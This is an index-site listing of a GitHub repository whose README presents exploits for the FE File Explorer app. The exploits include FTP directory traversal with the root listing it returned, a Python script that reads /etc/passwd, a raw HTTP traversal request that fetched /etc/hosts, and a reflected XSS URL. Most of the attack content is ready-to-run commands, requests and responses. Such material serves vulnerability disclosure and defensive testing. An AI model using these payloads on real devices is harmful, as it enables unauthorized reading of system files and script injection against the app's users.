Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/blue0x1/fe-file-explorer-exploit
FE File Explorer Multi Vulnerabilities
https://github.com/blue0x1/fe-file-explorer-exploit
Last synced: about 2 months ago
JSON representation
FE File Explorer Multi Vulnerabilities
- Host: GitHub
- URL: https://github.com/blue0x1/fe-file-explorer-exploit
- Owner: blue0x1
- Created: 2022-09-06T21:33:18.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-09-06T21:58:35.000Z (over 2 years ago)
- Last Synced: 2024-11-09T13:16:35.158Z (about 2 months ago)
- Language: Python
- Size: 5.86 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# FE-File-Explorer
FE File Explorer Multi Vulnerabilities
### Directory traversal:
connect to ftp as anynomous
ftp> cd /../../../../../../../../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr
drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin
drwxr-xr-x 0 root wheel 576 Jan 01 1970 sbin
drwxr-xr-x 0 root wheel 160 Jan 01 1970 System
drwxr-xr-x 0 root wheel 672 Jan 01 1970 Library
drwxr-xr-x 0 root wheel 224 Jan 01 1970 private
drwxr-xr-x 0 root wheel 1132 Jan 01 1970 dev
drwxr-xr-x 0 root admin 3968 Jan 01 1970 Applications
drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer
drwxr-xr-x 0 root admin 64 Jan 01 1970 cores
## Local File Inclusion ( FTP ) :
python3 'FE File Explorer.py' --target 192.168.1.178 --file etc/passwd
FE File Explorer Local File inclusion
optional arguments:
-h, --help show this help message and exit
--target TARGET Target IP
--file FILE File To Open eg: etc/passwd
### Local File Inclusion (web) :
GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.178:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
---
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Wed, 13 Jul 2022 10:35:46 GMT
Date: Tue, 06 Sep 2022 21:40:40 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312311378/1657708546/0
##
Host Database
#
.# localhost is used to configure the loopback interface
.# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
### Reflected xss:
http://192.168.1.178:8080/download?path=%3Cscript%3Ealert(%27rose%20taken%27);%3C/script%3E